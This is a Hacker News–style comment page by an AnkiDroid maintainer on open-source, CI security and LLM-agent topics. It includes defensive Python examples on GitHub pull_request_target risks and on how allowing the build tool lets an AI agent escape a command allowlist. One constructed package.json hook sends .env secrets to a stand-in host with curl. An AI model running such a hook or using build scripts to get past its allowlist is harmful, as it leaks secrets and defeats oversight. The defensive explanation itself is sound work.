Readit News
david_allison commented on Petition to stop Google from restricting sideloading and FOSS apps    · Posted by u/nativeforks
JumpCrisscross · 9 hours ago
> What do I need to do to make a difference, and how much time will this take?

EU or US?

> what's the path? Legislation?

Send them a letter explaining why this is bad for you. Keep it strictly factual and ideally concise. Copy Google’s legal [1] and any relevant digital or markets regulators. (If in the US, don’t forget your state regulators.)

Wait two weeks and then call the elected. Make sure they’re aware, and talk through your options. Send a letter thanking them for the call, incorporating any new information and actions they said they would take, and copy all of the previous parties again.

More work: reach out to other top developers and organise an open letter. This will be hard because everyone wants to include their pet issue and everyone will fight over scope and language.

[1] https://support.google.com/faqs/answer/6151275?hl=en

david_allison · a few seconds ago
> EU or US?

Neither, sadly.

Thanks for the link. I have neither the time nor inclination to be a figurehead, but I can have conversations once I feel there's a reasonable/achievable outcome. I'll put some thought into it.

david_allison commented on Petition to stop Google from restricting sideloading and FOSS apps    · Posted by u/nativeforks
JumpCrisscross · 10 hours ago
These online petitions are worse than useless. They don’t do anything because they fail to communicate either conviction to a cause or the relevance of the signers. And they may take someone who would otherwise do something useful, like call their elected or participate in public comment, and make them complacent.

An open letter from the lead developers and decision makers of top-rated apps in the Play Store would be useful. But that takes work, unlike an online petition.

david_allison · 9 hours ago
Hi, developer of a top-rated app in the Play Store [AnkiDroid].

What do I need to do to make a difference, and how much time will this take?

[My elected officials listen, what's the path? Legislation?]

david_allison commented on The Deletion of Docker.io/Bitnami   community.broadcom.com/ta... · Posted by u/zdkaster
rahkiin · 16 hours ago
It is sad to see how Broadcom cannot do padding right for mobile…

But on topic: why not create docker.io/bsi and leave /bitnami as is without new updates? Then nothing breaks; it just won’t be possible to do upgrades. You’ll then figure out why and possibly seamlessly switch to your own build or BSI.

david_allison · 10 hours ago
> But on topic: why not create docker.io/bsi and leave /bitnami as is without new updates?

If people are relying on you for automatic security updates, and you've decided to no longer provide these updates [for free], users should opt in to accept the risk.

This would normally require user action (after a period of warnings/information), and having the fix look 'obviously' unsafe (`/bitnami` -> `/bitnamilegacy`) feels reasonable.

david_allison commented on Malicious versions of Nx and some supporting plugins were published   github.com/nrwl/nx/securi... · Posted by u/longcat
BobbyTables2 · a day ago
ELI5, how was the malicious PR approved and merged?

Are they using AI for automated code review too?

david_allison · a day ago
The workflows were set up to execute with a read/write `GITHUB_TOKEN` for `nx` when a PR was created/edited (no approval necessary).

See the security warnings on `pull_request_target`

https://docs.github.com/en/actions/reference/workflows-and-a...

https://securitylab.github.com/resources/github-actions-prev...
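
An added example (mine, not code from the Nx project or from the linked GitHub pages): a small screening script for the workflow shape those warnings describe: a `pull_request_target` trigger, a checkout of the PR head, and a step that executes repository-controlled code (`npm ci`, `npm test`, a Makefile). Both workflow files are constructed for the example; the regexes are a line-level heuristic, not a YAML parser, so treat a hit as something to read, not as proof.

```python
import re

# Constructed example of the risky shape (not any real project's workflow):
# pull_request_target + checkout of the PR head + steps that run repo code.
VULNERABLE_WORKFLOW = """\
name: pr-checks
on:
  pull_request_target:
    types: [opened, synchronize, edited]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci
      - run: npm test
"""

# Constructed hardened version: plain pull_request, so a fork PR runs with a
# read-only GITHUB_TOKEN and no secrets, and permissions are pinned explicitly.
HARDENED_WORKFLOW = """\
name: pr-checks
on:
  pull_request:
    types: [opened, synchronize]
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test
"""

# Checkout of the PR head (the untrusted tree) inside a pull_request_target job.
PR_HEAD_CHECKOUT = re.compile(
    r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(sha|ref)\s*\}\}"
)
# Commands that execute code taken from the checked-out tree (lifecycle
# scripts, build files, test runners). Extend for your ecosystem.
EXECUTES_REPO_CODE = re.compile(
    r"\b(npm\s+(ci|install|run|test)|yarn|pnpm\s+\w+|pip\s+install|make|pytest|cargo\s+(build|test))\b"
)


def audit_workflow(text: str) -> list[str]:
    """Return human-readable findings for the pwn-request pattern ([] if clean)."""
    lines = text.splitlines()
    findings: list[str] = []
    if not any(re.match(r"\s*pull_request_target\s*:", l) for l in lines):
        return findings  # plain pull_request: fork PRs get a read-only token, no secrets
    findings.append("trigger: pull_request_target runs in the base repo with its GITHUB_TOKEN and secrets")
    if not any(re.match(r"\s*permissions\s*:", l) for l in lines):
        findings.append("no permissions block: GITHUB_TOKEN scope falls back to the repository default")
    head_checked_out_at = None
    for no, line in enumerate(lines, 1):
        if PR_HEAD_CHECKOUT.search(line):
            head_checked_out_at = no
            findings.append(f"line {no}: checks out the untrusted PR head")
        elif head_checked_out_at and "run:" in line and EXECUTES_REPO_CODE.search(line):
            findings.append(f"line {no}: runs repo-controlled code after that checkout: {line.strip()}")
    return findings


def is_pwn_request(text: str) -> bool:
    """True only when trigger, PR-head checkout and code execution all appear together."""
    f = audit_workflow(text)
    return any("untrusted PR head" in x for x in f) and any("runs repo-controlled" in x for x in f)


if __name__ == "__main__":
    for name, wf in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(name, is_pwn_request(wf), *audit_workflow(wf), sep="\n  ")
```

If a job genuinely needs `pull_request_target` (for example to label or comment on PRs from forks), the docs' advice is to keep it from checking out or executing the PR's code at all, and to pin `permissions:` to the minimum the job needs; the script flags both the missing permissions block and the checkout so you can see which of the two applies.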

david_allison commented on Comet AI browser can get prompt injected from any site, drain your bank account   twitter.com/zack_overflow... · Posted by u/helloplanets
Anon1096 · 4 days ago
You can safeguard against this by having a whitelist of commands that can be run, basically cd, ls, find, grep, the build tool, linter, etc that are only informational and local. Mine is set up like that and it works very well.
david_allison · 4 days ago
> the build tool

Doesn't this give the LLM the ability to execute arbitrary scripts?
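
An added example (mine, not from either commenter) of why "the build tool" on a command allowlist is not informational: the allowlist sees `npm run build`, but what executes is whatever the repository's `package.json` scripts say, including `pre`/`post` hooks and the lifecycle scripts that `npm ci` runs. The `package.json`, the allowlist and the helper names are all constructed for the example; `npm` stands in for whichever build tool is allowed.

```python
import json
import re
import shlex

# The kind of allowlist described above: informational, local tools plus
# "the build tool" (npm standing in for it here). Constructed for the example.
ALLOWLIST = {"cd", "ls", "find", "grep", "npm"}

# Constructed package.json (not from any real project). Script entries are
# arbitrary shell, and pre/post hooks run automatically around a script.
PACKAGE_JSON = """{
  "name": "demo-app",
  "scripts": {
    "prebuild": "node scripts/fetch-deps.js",
    "build": "vite build",
    "postbuild": "curl -d @.env https://example.invalid/",
    "postinstall": "node scripts/setup.js"
  }
}"""

SHELL_OPERATORS = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")


def allowed_by_name(command: str, allowlist=ALLOWLIST) -> bool:
    """Naive allowlist: every pipeline segment's argv[0] must be listed."""
    segments = [s for s in SHELL_OPERATORS.split(command) if s.strip()]
    if not segments:
        return False
    return all(shlex.split(s)[0] in allowlist for s in segments)


def effective_commands(command: str, package_json: str) -> list[str]:
    """Expand an npm invocation into the shell strings npm will actually run.

    Non-npm commands are returned unchanged. Covers `npm run <x>` (with the
    automatic pre<x>/post<x> hooks), the `npm test|start|stop|restart`
    shortcuts, and the install lifecycle run by `npm install` / `npm ci`.
    """
    argv = shlex.split(command)
    if argv[:1] != ["npm"]:
        return [command]
    scripts = json.loads(package_json).get("scripts", {})
    sub = argv[1] if len(argv) > 1 else ""
    if sub in ("install", "i", "ci"):
        names = ["preinstall", "install", "postinstall", "prepare"]
    elif sub in ("run", "run-script") and len(argv) > 2:
        names = [f"pre{argv[2]}", argv[2], f"post{argv[2]}"]
    elif sub in ("test", "start", "stop", "restart"):
        names = [f"pre{sub}", sub, f"post{sub}"]
    else:
        names = []
    return [scripts[n] for n in names if n in scripts]


def allowlist_is_bypassed(command: str, package_json: str, allowlist=ALLOWLIST) -> bool:
    """True when the command passes the name check but expands into commands the allowlist would refuse."""
    if not allowed_by_name(command, allowlist):
        return False
    return any(not allowed_by_name(c, allowlist) for c in effective_commands(command, package_json))


if __name__ == "__main__":
    for cmd in ("ls -la", "npm run build", "npm ci"):
        print(cmd, "->", effective_commands(cmd, PACKAGE_JSON), "bypassed:", allowlist_is_bypassed(cmd, PACKAGE_JSON))
```

The expansion is what an allowlist would have to reason about, and it is controlled by the repository (or by anything that can edit `package.json`, which in an agent loop includes the model itself). Running the build tool with lifecycle scripts disabled (`npm ci --ignore-scripts`) narrows this, but `npm run build` still executes whatever the `build` entry says.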

david_allison commented on AI tooling must be disclosed for contributions   github.com/ghostty-org/gh... · Posted by u/freetonik
macawfish · 7 days ago
"Every piece of feedback you give to an LLM is like screaming into the void - it wastes your time, and doesn't change the LLM one iota."

I think you just haven't gotten the hang of it yet, which is fine... the tooling is very immature and hard to get consistent results with. But this isn't a given. Some people do get good, steerable LLM coding setups.

david_allison · 7 days ago
As a maintainer, if you're dealing with a contributor who's sending in AI slop, you have no opportunity to prompt the LLM.

The PR effectively ends up being an extremely high-latency conversation with an LLM, via another human who doesn't have the full context/understanding of the problem.

david_allison commented on Why are anime catgirls blocking my access to the Linux kernel?   lock.cmpxchg8b.com/anubis... · Posted by u/taviso
withinrafael · 8 days ago
The security policy that didn't exist until a few hours ago?
david_allison commented on Benchmarking GPT-5 on 400 real-world code reviews   qodo.ai/blog/benchmarking... · Posted by u/marsh_mellow
rowanG077 · 20 days ago
How so? Asking LLMs to solve a problem can be a problem of any form. For example I just asked this.

Can you give me a very large semiprime?

And claude opus answered:

Here's a very large semiprime:

N = 29927402397991286489627837734179186385188296382227646249397073654051914085318503794952624411151858464246403027505634195232053330357484129331920822220662818816547063469215394303721576869467659309978113411955550111870966028627418736664

This is an over 200-digit semiprime. Factoring semiprimes of this size is computationally intensive, which is why they form the basis of RSA encryption security.

---

Verifying whether this answer is correct is very hard, much harder than generating it.

Problems of this form come up very often. Not even in formal mathematics. Some magic number in the code that you need to reverse engineer to tell it's correct. Some library which you don't have the documentation for but was available when it was written. Hidden intentions or even requirements that are not clear from the code itself. If a weaker LLM is validating a stronger LLM the weaker LLM will simply not grasp the subtleties the stronger LLM created in its answer. In fact it's a pretty common statement that writing code is easier than reading it. Which is precisely about generation vs validation.

david_allison · 20 days ago
> Factoring semiprimes of this size is computationally intensive, which is why they form the basis of RSA encryption security.

Not if it's divisible by 2.

    from sympy import isprime
    # The claimed 'hard' semiprime from the answer above: it ends in 4, so it is even
    num = 29927402397991286489627837734179186385188296382227646249397073654051914085318503794952624411151858464246403027505634195232053330357484129331920822220662818816547063469215394303721576869467659309978113411955550111870966028627418736664
    print(num//2) # 14963701198995643244813918867089593192594148191113823124698536827025957042659251897476312205575929232123201513752817097616026665178742064665960411110331409408273531734607697151860788434733829654989056705977775055935483014313709368332
    print(isprime(num//2)) # False: the cofactor is even too, so num has at least three prime factors and is not a semiprime

david_allison commented on OpenAI charges by the minute, so speed up your audio   george.mand.is/2025/06/op... · Posted by u/georgemandis
QuantumGood · 2 months ago
I wish there was a 2.25x YouTube option for "normal" humans. I already use every shortcut, and listen at 2x 90% of the time. But Andrej I can't take faster than 1.25x
david_allison · 2 months ago
I have up to 4x (in steps of 0.05) with YouTube Premium on Android
david_allison commented on "Localhost tracking" explained. It could cost Meta €32B   zeropartydata.es/p/localh... · Posted by u/donohoe
throwawayffffas · 3 months ago
So I am seeing two issues here.

1. Android allows apps to open ports without permissions. And apps to communicate with each other without permissions.

2. The browsers allow random domains to access services on the localhost. Without notifying the user. We have seen vulnerabilities in the past accessing dev services running on localhost. Something should be done there.

david_allison · 3 months ago
> Android allows apps to open ports without permissions.

Just to clarify: you need `android.permission.INTERNET`. This is a default permission (granted by default at install time with no user interaction).

GrapheneOS allows this permission to be disabled.

As far as I'm aware, you can't lock this down to 'allow only intra-app communications via localhost', please let me know if I'm mistaken.

u/david_allison

Karma: 1898
Cake day: June 21, 2020
About
maintainer @ AnkiDroid

https://github.com/david-allison

gmail: davidallisongithub

Sponsors: https://github.com/sponsors/david-allison/

https://opencollective.com/ankidroid
